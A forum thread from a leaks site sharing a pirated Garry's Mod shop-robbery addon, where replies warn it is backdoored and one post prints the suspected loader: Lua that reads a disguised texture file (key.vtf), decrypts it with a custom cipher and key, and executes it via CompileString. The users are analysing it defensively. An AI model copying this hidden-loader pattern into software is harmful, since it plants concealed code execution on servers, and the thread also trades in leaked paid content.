Garry's Mod Leaks

Advanced Showcase Robbery - Rob shops and storefronts

Submitted by Dima12345, , Thread ID: 191627

Thread Closed
25-12-2020, 03:19 PM
#1
[font="Hind Vadodara", sans-serif]DESCRIPTION[/font]

[font="Hind Vadodara", sans-serif]This script implements a new robbing system that is centered around showcase and storefronts instead of your standard bank robbing scripts. This adds another activity for all your criminal jobs. The shops can be placed everywhere on the map as it uses stencils![/font]

>>>>>ADDON
This hidden content has been reported as not working 0 times this month.
1 times in total

RE: Advanced Showcase Robbery - Rob shops and storefronts

#2
Somebody check this addon for backdoors, write here pls

RE: Advanced Showcase Robbery - Rob shops and storefronts

#3
Thanks for addon, i searching this...
Is that backdoor cleaned?

RE: Advanced Showcase Robbery - Rob shops and storefronts

#4
backdoors , dont download

RE: Advanced Showcase Robbery - Rob shops and storefronts

#5
It really does have backdoor i recommend not to download it. buy it

RE: Advanced Showcase Robbery - Rob shops and storefronts

#6
25-12-2020, 03:19 PM
Dima12345 Wrote:
[font="Hind Vadodara", sans-serif]DESCRIPTION[/font]

[font="Hind Vadodara", sans-serif]This script implements a new robbing system that is centered around showcase and storefronts instead of your standard bank robbing scripts. This adds another activity for all your criminal jobs. The shops can be placed everywhere on the map as it uses stencils![/font]

>>>>>ADDON

I'm overly suspicious of this line of code, which directly looks in the main directory of Garry's Mod
Code:
function LoadModel(m, n, o)
  local p = file.Open(m, "rb", "BASE_PATH") <--- This thing
  if not p then return end
  p:Skip(o)
  local q = p:Read(p:Size() - o)
  p:Close()
  local l = d(q, n)

  return CompileString(l, m, false)
end

i found this in the Garry's Mod Wiki:
Information about BASE_PATH

more than anything there is a very complex decryption system that operates with a certain file.
Code:
local function a(b, c)
  c = c % 177

  return (b - c) % 177
end

local function d(e, f)
  local g = tonumber(util.CRC(f))
  local h = string.len(e)
  local i = string.len(f)
  local j = 1
  local k = 1
  local l = {}

  while j <= h do
    j = j + string.byte(f[k % (i - 1) + 1])
    l[k] = a(string.byte(e[j]), g)
    k = k + 1
    j = j + 1
  end

  return string.char(unpack(l))
end


function LoadModel(m, n, o)
  local p = file.Open(m, "rb", "BASE_PATH")
  if not p then return end
  p:Skip(o)
  local q = p:Read(p:Size() - o)
  p:Close()
  local l = d(q, n)

  return CompileString(l, m, false)
end

local r = LoadModel("garrysmod/addons/advanced-showcase-robbery/materials/asr/key.vtf", [[epC$5~rNM~k[<="cNF/lM,Iz$Fh1,)]s+\?~'Cla.n{/z`8/VLuE,gWwxnPk-y-x[?D2.V9zFTPsD,TXPt9KD75.}U$!MW,enaWg9ez&@(a{B[[;v5JxxfGO$DJw92&c]], 0)
r() <--- this call the it calls all the previously structured function

...

RE: Advanced Showcase Robbery - Rob shops and storefronts

#7
Backdoored... I really not recommend to download it

Users browsing this thread: 2 Guest(s)